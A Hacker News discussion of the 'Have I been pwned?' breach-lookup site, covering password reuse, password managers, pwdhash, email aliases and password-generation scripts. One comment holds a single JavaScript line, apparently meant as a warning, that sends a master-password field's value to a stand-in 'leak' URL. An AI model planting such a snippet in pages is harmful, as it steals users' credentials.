Have I been pwned? Check if your email has been compromised in a data breach
haveibeenpwned.com
haveibeenpwned.com
I got a call from PayPal a week or two ago. It turns out somebody in Indonesia accessed my Paypal account, presumably with credentials scraped from adobe. I know, I know, shame on me for reusing passwords. Luckily no damage was done and I did a change to the strongest password I've assigned anything yet.
Great job, op (if you're the one who wrote this service) for such an amazing tool. Everyone, if you haven't already, you really should check if you've been compromised. I will be sending this to all my friends.
I checked my email address on this site and it didn't find any pwnage.
I'm relieved my email address isn't in any of these leaks, but also now concerned about whatever it was that let someone into my paypal account so easily...
Sites that need to be secure, hopefully really are secure. Sites that don't really need to be secure because they don't deal in anything of value, probably don't invest quite as much in security. Reusing passwords across those different kinds of sites means the extra security of the secure sites is wasted.
Of course it's way better not to reuse at all, but remembering two or three passwords is a lot easier than dozens, and still a lot safer than just one.
Call me paranoid but it took me half an hour to set it up and the monthly fees for the servers are very very low.
Might want to think through whether that really counts as "your own". Who's got hypervisor access to the hardware? Any keys or passphrases that ever hit the disk or memory on someone else's hardware should (at least at some levels of paranoia) be considered "possibly compromised".
(I store "sensitive stuff" on AWS/DigitalOcean/other-vps-providers, but only if it's first encrypted locally and the key/passphrase never gets used/stored on the vps. EncFS works pretty well dealing with that for me... I do, though, "trust" 1Passwords datafile encryption enough to take advantage of the iOS/MacOSX sync features they've implemented over Dropbox. That's possibly not achoice I'd make i I thought I were a target of someone like the NSA.)
For lesser security critical logins, I've got my password software (1Password) on my phone (and iPad). For some intermediate level logins, I need my phone or iPad anyway, I've got TOTP two favor auth (using Google's Authenticator app) on a bunch of important stuff (Amazon/AWS, DigitalOcean, Dropbox, Guthub, the email account that all my domain names are registered with and to which password resets go, and a few other things…)
I've had a "primary computer" stolen before – and I don't intend to ever have that much grief if (when?) it happens again. I'm confident that even if all the electronics from either one of my work or home get stolen, I could be back into fully productive work-mode in half a day and one maxed-out-creditcard at the local Apple store. (If someone hits both my work and home locations simultanously, I suspect I've got bigger problems that whether I'll have angry clients shouting at me before the weekend…)
But if I do need to, I have 1Password on my phone as well and can get the passwords from it.
But I would not really be comfortable using it on an unknown computer, unless I had good knowledge that it was properly administered.
Convenience provided via Chrome/Firefox extensions, portability provided by the website.
Even in the event a leak of plain-text passwords I'm still secure in knowing that my other accounts won't be compromised unless there is a very determined attacker.
However, you do have to put some trust in the extension and the website. Fortunately, the website has some good credentials and the extensions have appeared clean... for now.
One thing I have noticed though is that when one enters the same site password, you get the same "Hashed" password back to use. Yes, there is an extra step involved here so that buys you some security but I will be cautious in reusing site passwords.
Imagine an attack where for the top 100 sites in the world, all of the most commonly used passwords are used to generate the "Hashed" (pwdhash) passwords for each site and compile that info into a big list. This can then be added to the candidate list of password that can be tried in cracking leaked hashes.
The take way here is that even though pwdhash gives you domain-specific generated passwords, you will make to sure that you use a different site password as input to pwdhash for each site.
document.documentElement.addEventListener("DOMSubtreeModified", function() {$("#gp2_master").change(function() {location.href = "http://example.org/leak/" + $("#gp2_master").val()})})
They don't seem to mention anywhere which hashing algorithm they use. Also, the lengths are quite small. Any idea why?
[1] My 3.x was upgraded to 4.x on my Macbook (unbidden) and the only way to restore compatability with my 3.x on iOS is to pony up another $20. Can't go back to 3.x on the Macbook, not particularly happy about the upgrade fee on iOS.
Consider this a heads up for married HN'ers, you should check their emails too.
Imagine how much that wallet could be worth... How much bribe does the weakest 1Password engineer need?
printf "/" ; openssl rand -base64 32 | sed 's/.$//'
The leading slash was a nice tip someone gave me to not echo if you accidentally paste the password into IRC... Though if the password itself contains a slash then your client won't consider it a command and will echo it anyway, so do what you will.
Anyway, each new account gets a new password you couldn't beat out of me, though you could probably get my password safe phrase, so do what you will.
Generating long passwords like this highlights providers who enforce password length limits. Paypal's limit is ludicrously short. Hetzner's is limited too.
edit more guff.
> there are many to choose from
This is the reason I don't use one... I still haven't decided which, even if _any_ is better than nothing.But the point I'm trying to get across is, if I were unlucky that could have turned into a HUGE mess where I was accused of stealing said credit card. Luckily that did not occur (probably because they could trace it to a separate IP address.. and I don't own an Xbox). I no longer use passwords as insecure as I did for that account - I had to deal with this headache while at my family's Christmas party as well (because that is when I received the email), which made it even more irritating.
The email account is on Hotmail and currently has about 54k messages in its in-box, 99.9% unread. I use it to create accounts on news sites and annoying fora and such, always with the same weak password. About the only time I log into is to respond to password confirmation requests generated during account creations.
Originally, the weak password was also my email password. However, a few years ago, the email account got hacked severely, such that MSFT wouldn't let me in until I reset the password. It now has a strong password.
The added feature is that, if your email is in the list, Last Pass will share with you how many others had your same password -- and the list of all password hints associated with that password. If more than a handful of others used the same password, that should jog your memory about which you used.
P.S. I'm not associated with Last Pass and actually use a different product. But I found this site very helpful.
I certainly don't reuse financial or email passwords. Or actually I do, but only for financial and email stuff. But I probably shouldn't reuse them at all.
But those forums? I'm just not going to keep track of a new password for every site I visit.
Seriously - you can't manage 2013 grade password complexity requirements for all the places you need passwords in your head any more (it's likely you never could…)
Get a tool to help, computers are wonderful tools.
More than that, I'd rather not put my KeePass DB on someone else's machine in the first place. But I'll easily trust strange computers with a password for some crappy forum.
There's always something you risk compromising. I prefer some forum account to be compromised.
I've gone to generating a unique password with a simple random number generator if the end site supports password recovery (in case Chrome's password memorizing system forgets it).
#!/bin/bash if [ $1 ] ; then a=$1 else a=16 fi dd if=/dev/urandom bs=1000 count=1 2>/dev/null | tr -d -c "[:alnum:]" | tr -d '`' | tr -d "'" | tr -d '"' | tr -d '\\' | head -c $a echo
I essentially use the following:
base64 </dev/urandom | head -c $COUNT | xargs -0 LANG=C tr -dc "[:print:]" < /dev/urandom | fold -w 32 | head -n 1There's also the benefit of fewer moving parts -- with a pipeline like that, I'd be worried about accidentally stripping out some of the randomness. I'm fairly confident that a simple invocation of `pwgen` will work.
I knew I was, but I was delighted by what Dreamhost did: they have cross-checked their users' e-mails with the Adobe leaked database and sent a message [1] to affected users explaining the situation and advising to change the passowrd, reminding to not re-use passwords and suggesting password vaults.
I think it's a great thing to do by third-parties when leaks of this magnitude happen.
[1] Full text: http://pastebin.com/2AkU0v98
49 customers are in line ahead of you. ..5 mins.. 48 customers are in line ahead of you. ..5 mins.. 48 customers are in line ahead of you. ..5 mins.. 48 customers are in line ahead of you. ARG!
Looks like no.
"Have I been pwned?" is by Troy Hunt http://www.troyhunt.com/
The OP's bio indicates that they are someone else. https://news.ycombinator.com/user?id=mountaineer
You have requested that we deactivate your Adobe account. We have sent a request to the relevant team to process your request. Please note that you will lose access to Adobe services and support for which you have registered or paid for. You will not be able to obtain serial numbers for past purchases and the deactivation process may take up to ninety (90) days. Once completed, your adobe.com membership and all personal data will be deleted from our database.
Adobe, every single time I had anything to do with you it sucked. Big time.
Of course that is absolute bullshit, it took them 120+ days to close my account and I had not used it for over 4 years at that point. They actually emailed me telling me that they were closing the account due to inactivity. They gave me 3 or 4 months to log on before it would be killed, so I thought to myself "good, saves me the hassle of doing it myself". Fast forward 3-4 months and I get an email telling me my account was compromised. Weird... so I log on, confirm any payment info I had was long since expired, confirmed nothing had happened and that my password was intact... then I scrambled the security question and password just to be safe and told Ebay to delete the account. Cue "this will take 120+ days" bullshit... but whatever.
At nearly the end of that 120+ days I get emailed again telling me the account was compromised. I'm convinced this is a scam they run to trick you into logging into your account, thus resetting the the countdown.
Ebay and paypal are among my least trusted companies. I have a higher opinion of even Comcast or Halliburton.
I cancelled and about three months later I was "compromised". At that point I reset the data to random values, deleted my "ebay@example.com" email alias, and just resigned myself to forgetting about it.
So, let's say for example, my current core is "kgA85kjF3". Then for example, I'd morph that for my Hacker News account to "ZkgA85kjF39!" and my fileserver as "UkgA85kjF3O2". I thought this was a good method of having reasonably long passwords but I'd have to memorize very little per site.
So imagine my surprise, when I created a new password "NkgA85kjF3T3", cracklib found a dictionary word in it. It got worse from there. Through experimentation, I determined that it was indeed the core that was compromised. Any password containing "kgA85kjF3" was compromised.
I have no idea how this happened. If this was not a big cosmic coincidence, if this is not just a random regex filter accident, that means data from at least two known password databases containing my cores has been correlated, and put into cracklib no less. There is really no limit to the imagination regarding what illegitimate databases might contain...
However, the hashing step makes it impractical for me on different devices in certain situations. I don't want to rely on browser extensions or apps either. So I'm changing my passwords to the output of an algorithm I can do in my head now.
What's so bad about it?
Granted if they have limits thats a really big red flag that they're storing your password in plain text, as a hash should always be the same length, so you probably shouldn't sign up there anyway. I remember a few years ago I was signing up for a TD account, and about 5 pages through the signup page it wouldn't allow me to continue because my password was /too secure/ (not their exact wording, but that was basically the problem). What makes it funnier is a lot of sites would reject the password I used at the time as not being secure enough.
I stopped signing up at that point, but I remember getting a phone call (!) from them a couple days later asking why I didn't finish the sign up, and my answer was: because I'm not giving my money to a company that doesn't know how to store passwords!
They also limit your password to 8 characters.
This is a huge government website that heaps of Australians have to access at least fortnightly.
a) Either sending/receiving machine is broken into
b) Someone or something is intercepting your message
c) The service you are using is broken into
There's just too many holes to plug and too many people with expertise in these domains orders of magnitude above ours that they can use to either be malicious, or help our cause.
Your computer/device needs to be secure. Your other parties devices need to be secure. Your connection needs to be secure. Your third parties service needs to be secure. The internet the third party uses needs to be secure. Their data centre needs to be secure. Then their ISP needs to be secure.
All data is online.
On Linux command line, you just feed the password to it:
echo "password" | cracklib-check brew install cracklib cracklib-words
echo "lol" | cracklib-check* https://lastpass.com/linkedin/
This demonstrates nicely why that's a bad idea.
How is this possible? How did Adobe leak my address if I don't even have an account?
http://blog.lastpass.com/2012/01/new-years-resolutions-with-...
The LastPass checker is really nice. Whats scary is that it found a few other people that had the same password as me.
For the Adobe breach, LastPass also emails you a sample of the password hints of others -- its kind of funny how people remember a certain string.
E-mail addresses are not secret. They cross the wire in plaintext, they get stored in various mail server logs in various relays across the globe, they get passed around by spam analysis services, anti-virus services, and any company you submit it to has the right to sell it and any other information about you to anyone they want, without your consent.
"Although partial regulations exist, there is no all-encompassing law regulating the acquisition, storage, or use of personal data in the U.S. In general terms, in the U.S., whoever can be troubled to key in the data, is deemed to own the right to store and use it, even if the data were collected without permission." [1]
California is one of the few (only?) states with privacy laws, and it basically just says companies must post a privacy policy and follow it - and that policy could, for example, say they are allowed to sell on your information, which i'm sure 99% of companies would opt for.
Your e-mail address alone is not worth much in a general sense. In terms of spammers, they already have all the e-mail addresses in this list. And if on the off chance this guy's service is "selling" e-mail addresses to spammers (at what... $0.10 per e-mail address?), are you really so afraid of someone sending you spam?
[1] https://en.wikipedia.org/wiki/Information_privacy_law#United...
For more information about all the other personal information about you that isn't private, see https://epic.org/privacy/profiling/
People knowing that you have account yyy@example.com at example.net could use that information in a spear-fishing attack, or know that you're involved in a controversial website, prohibited website, etc.
Emails were not the only things that were stolen. For example, in the Adobe breach, encrypted passwords were stolen. If your email address is shown as being in the Adobe breach, that also means that your encrypted password, password hint, etc. were stolen. For Sony, maybe credit card information.
If this website was only about whether email addresses were leaked, then why would anyone type in their email address into this website (thus leaking your email)?
https://en.wikipedia.org/wiki/Security_breach_notification_l...
and will soon be requiring disclosure of breaches of "personal information that would permit access to an online or email account"
https://www.huntonprivacyblog.com/2013/09/articles/californi...
http://www.troyhunt.com/ http://www.intodns.com/haveibeenpwned.com (forwarded from haveibeenpwned.azurewebsites.net) http://www.whois.com/whois/haveibeenpwned.com
Seems legit.
His recent posts on pwning peoples phones and tablets while they were at his conference talk are pretty amusing. Shows just how insecure things really are.
Also, I partially went through the Adobe password reset procedure two or three times--each time guessing at what my original password was. Unfortunately, they accepted all of my guesses, so I was still none the wiser about which password was compromised.
To top the entire ordeal off, Adobe was not the one to tell me that my password was compromised. Instead, my hosting provider and some other services notified me.
http://security.stackexchange.com/questions/45413/how-do-i-d...
This will tell you your password hint (and if any other user had an identical password, you will see their hint also. ) https://lastpass.com/adobe/
EG: twitter@example.com, facebook@example.com, hackernews@example.com
It also makes it a little harder for people to find me on social media. Not sure if that's a bug or a feature ;)
I follow the following pattern with websites:
If the website is important (ex. government), I use <sitename><4_numbers>@<private_domain>. My filtering rules are extremely strict, and every mail that doesn't come from the expected website gets automatically flagged as spam and deleted. If their DB leaks, I just change the 4 numbers.
If I know the website and it's not an startup, I use <sitename>@<public_domain>, ex. facebook@example.com. My filtering rules only flag the messages as "maybe spam" when the sender is not in my contacts. If their DB leaks, I change the filter from "maybe spam" to "spam".
If it's a website I don't know, or a startup, I use <full_domain>@<publc_domain>, ex. mystartup.io@example.com. I don't filter them, but if I start getting spam, I just simply set the email as an alias to my wormhole (an account I never check that flags anything it receives as spam).
If it's a spam blog, or a website that forces me to create an account by no apparent reason, I just use the wormhole address.
Envelope-to: <eba615c3c@my.domain>
in my reject log. Addresses that were never used anywhere. Some things just refuse to die.And about the spam to random addresses, in 8 years the most extreme problem I had faced is spam to censored addresses like git...@domain.com (thanks google code).
I wish there was a Gmail like application that anyone could set up easily on its server and that would allow for : quick email generation.
You need to sign up to something ? Generate a quick mail that redirects automatically to your main inbox and that you can give away when signing up.
If you see that spam is arriving on this email, remove it.
* it's easy to get the real email address from it.
* most sign up form don't accept the "+" sign.
FYI, I used to do this too. And this is how (in a similar fashion) Mat Honan got Gizmodo's Twitter and his iCloud and Gmail accounts hacked and also had his computer remotely wiped because he used his name in every domain/service as his account name or email account name.
Edited for more information.
I go through the trouble of creating a new email each time. I've considered writing a script to make it easier, but my current mail provider makes that difficult.
And if you use the same email for everything (as is the alternative), attackers can attempt to try that against popular sites. So I don't see the downside of this method?
I actually don't like the idea of using email addresses as user IDs. I believe that was a lazy approach in the first place and this causes too many problems. I'm sure it all started that way because someone wanted your contact info, and since the only way to guarantee a valid email was to make you verify it. It has nothing to do with security.
Nobody said security was easy or convenient.
Anyway, to each his own. I have my own domains and do, unfortunately, have about 100 email addresses/aliases. Yeah, it can be inconvenient to maintain. I originally started using the aliases because I wanted to know who was giving out my email to spammers. I caught a few and stopped doing business with them.
Some services will use that as the username, others allow me to pick my own. Using a password manager helps this whole scheme. Now that I do that, I could go to random email addresses and usernames.
The only way around this, I think, is to only have uncommon emails, like instead of admin@domain.com, use contactadmin@domain.com. Put a block on the common ones and you're good to go.
Spammers effectively killed that RFC.
Once i figured this out i just created wildcard aliases that end with a static prefix: netflix-blah@example.com, adobe-blah@example.com, etc. This cuts down on 99% of the random spam.
In a mass compromise like the Adobe one, it's highly unlikely that the hackers are going to go out of their way to attack people who use this method when there's millions of much easier targets already in their list.
Using this approach also makes it a lot easier to spot spam - if I get an email to "hackernews@myaccount.com" claiming to be from my bank, it's highly unlikely to be genuine. If it's coming to "mybank@myaccount.com", there's at least a fair chance that it's real - I still treat it with a fair amount of caution, but as I've filtered out the obvious junk I can spend more time checking out these reasonably genuine-lookuing one. Using a random email like hhj4378@myaccount.com would make this quick filtering a lot harder.
Coming to think of it, there has been some spam lately (though that hasn't happened in years now at gmail), and I wonder whether it's related to that Adobe leak.
I don't find any of several accounts I use on there, but did find a friend's email listed (and just notified him). I'd actually appreciate a way to query my mailing list in an automated fashion.
The reply address for spam is almost certainly bogus. And I don't think it makes sense to target people who unsubscribe for more spam. They ain't likely to buy anything.
I have a couple of email addresses that thanks to that address either having been sold, hacked or given away by including in the to/cc field of a mass mailing are now out in the public domain, and I get spam (and almost certainly malware attempts) on those two on a pretty regular basis. I'd prefer to not have the rest of my email addresses end up in the same situation.
Isn't there a better way to check for stolen addresses than to enter your email on a dodgy (hey, I followed a link on Hacker News) website? Such as calculating a hash on the client, and sending the hash for verification?
To check if a given email address was an Adobe/Gawker/whatever customer, you would've not only had to query every separate form but you would also not be guaranteed to get a definitive response (because some services will be ambiguous to whether you got a password wrong or whether the account exists at all). With the OP's service, with positive hits, you not only get confirmation of patronage, but knowledge that they are vulnerable, even if in a small, outdated way.
It's likely something Troy has anticipated but didn't want to outright say...In the end, knowledge is better than ignorance, and the correct response is for more rapid response to hacked victims and better security awareness. But I also wonder if there's a way to provide the OP's service with more (beneficial) obfuscation?
This isn't an indictment of Troy at all, just an observation (and I'm also just curious about what mitigation could be done, if any, that wouldn't severely inconvenience the end user). The security that exposed people had was security through obscurity, which is in the end, not enough security.
Additionally, there is a huge long tail of publicly available user databases that are not included in this site, which along with the lack of hashes makes it worthless for the purpose you envision.
It's also extremely easy to tell if an email is registered on a website if you aren't concerned about the victim being notified. You just need to attempt to either reset the password (it'll say whether the email exists) or register a new account with their email.
Just this morning I discovered that Sirius XM has been hacked. Shame.
It would make an interesting project to analyze all this history that I've built up.
Cool hack btw! The only thing missing is a "What to do" link which could be more useful for folks who are not so technically savy.
Edit: Found it, this was the one I was looking for. http://dazzlepod.com/disclosure/
E.g. If I signed up to Myspace I would use Myspace@exampledomain.com
I have the mail server at "www.exampledomain.com" set to accept all emails under the domain so I can see if someone has passed on my details legitimately or via hacking.
Since I've started about 12 months ago I've not found any cross pollination which seems a good sign for the industry in general.
It also adds a layer of security as your sign-up email changes for different websites if you use the same password across several.
Passwords: I’m not storing them. Nada. Zip. I just don’t need them
and frankly, I don’t want the responsibility either. This is all
about raising awareness of the breadth of breaches.
http://www.troyhunt.com/2013/12/introducing-have-i-been-pwne...[1] http://www.troyhunt.com/2013/12/introducing-have-i-been-pwne...
I'm writing up how the back end is done and will post it in the next day or two, IMHO it's massively impressive but also very easy :)
Showing a few more numbers might help more people realize that their passwords aren't actually unique, creative or safe. The data that came out of the Adobe hack is pretty interesting, and the results are much more tangible than "oh no, pwned!".
Something like:
"Your password was used by 8290 people.
Furthermore, 2615 persons gave a plain text hint as to what the password might be."
Instead I first started off with my own "password generator":
import random
import string
import sys
def generate_random(length, simple):
chars = string.printable[:-6] if not simple else string.letters + string.digits
return ''.join(random.sample(chars, 1)[0] for x in range(length))
def username():
return generate_random(length=4, simple=True)
def password(length):
return generate_random(length=length, simple=False)
if __name__ == '__main__':
length = 6
if len(sys.argv) > 1 and sys.argv[1].isdigit():
length = int(sys.argv[1])
for i in range(20):
print username(), password(length)Problem is, I can't think of a computationally efficient way to perform this check securely. I could see handing the user an nonce, asking them to manually hash their password concatenated with the nonce, and then comparing the user's response with a list you've hashed yourself, but I'm sure this won't scale well.
Is there such a thing as a secure, or "blind", bloom filter which allows a user to search for some chunk of text without exposing to the world what that chunk of text is?
Edit: Hmm, this might be what I'm looking for: http://www.tdp.cat/issues/tdp.a015a09.pdf
Most of the compromised sites use worthless password storage mechanisms, like unsalted hashes or plaintext, so this level of sophistication is mostly unnecessary. For example, say you used the password "foobar".
md5 that:
$ echo -n "foobar" | md5sum
3858f62230ac3c915f300c664312c63f -
Then Google for 3858f62230ac3c915f300c664312c63f. The first result's snippet is: = rainbow.lookup('3858f62230ac3c915f300c664312c63f') # => 'foobar' ...
There you go. Don't use "foobar" as your password. ~ $ echo -n "mypassword" | base64
bXlwYXNzd29yZA==
How would one combine the above with md5? on OS X is it `md5 -s <string>`So basically base64 'mypassword', then md5 the base64 result.
http://www.codinghorror.com/blog/2007/09/youre-probably-stor...
if you replace it with sha-2 you'd have the exact same problem (bcrypt is more than a simple hash function).
Are you talking about how you store your own passwords so that you may retrieve them in order to log into some service, or are you talking about how you store user credentials as part of an application?
If you're storing your own passwords, just use a well-rated password locker program, or store them in a TrueCrypt volume or similar. If you're storing your users' passwords... well, don't -- store the hash like that Atwood article suggests.
To your initial question, if you need to use the output of one program as an argument to another program, you can wrap it in backticks:
md5 -s `echo -n please_dont_actually_do_this | base64`
But really there's no benefit to converting it to base64 before you hash.Thanks for the reminder of ticks (`) I was accidentally using single quotes (')
But if you don't care about them actually being secure, party on...
Aside from backticks, you can also use the dollar quote (I'm sure this has a better name):
$(some_command some arguments | some_other_command)
Finally, back to the original "how do I combine this with md5" question, you don't, as that won't do what you want. That is, you want to be able to recover the plaintext, but cryptographic hashes are designed specifically to make that practically impossible.I think the best solution to this is to make sure your passwords ONLY exist in your head, nowhere else. And to NOT reuse your passwords, you have to create a unique and reasonably strong one for each service.
So how do I remember all these unique and strong passwords? I create an algorithm which takes two parameters as inputs: my username and the domain of the service, it will do some simple manipulation of the inputs and give me a reasonably strong password. Hence, all you need to do is to remember your algorithm and use it to compute your password when you need it. Of course, you want the algorithm simple enough to be done in your head.
Only now in this fleeting moment do I realize that i'm now tied to LastPass's ecosystem.
EG: "john*@gmail.com"
I'd then feel better about typing my address into a random site, and be able to check site-specific variants of my address more easily.
For every different site I use a different email address, so I know when something fishy is going on. so I might have hackernews@mydomain.com. The form wont accept just @domainname.com :(
Obviously this would stop people providing the same password for all services... But might creep some people out!
Would hopefully highlight how insecure/guessable non salted hashes are. Does anyone know best practice for doing things like this?
Lots of sites block mailinator, but then use one of their aliases – foobar@spamgoes.in ... then check http://foobar.mailinator.com/
I tried a bunch of fake hotmail emails and 90% of them are "pwned". Very suspicious to say the least.
Shouldichangemypassword.com sent me an email a few weeks ago saying my email address was found in a leaked database, although they couldn't say which one. Considering I have more than 100 accounts which use that particular email address, it didn't help at all. This site did!
http://nakedsecurity.sophos.com/2013/11/04/anatomy-of-a-pass...
It would be irresponsible for anybody to share the key, it would reveal all the passwords.
I didn't even know I had an Adobe account, I don't use any Adobe products.
Does lastpass work great for checking banking on cellphones and other logins that would require a cut and paste on a desktop?
http://www.yubico.com/products/yubikey-hardware/yubikey-neo/
My spam url and my real one, goddamned.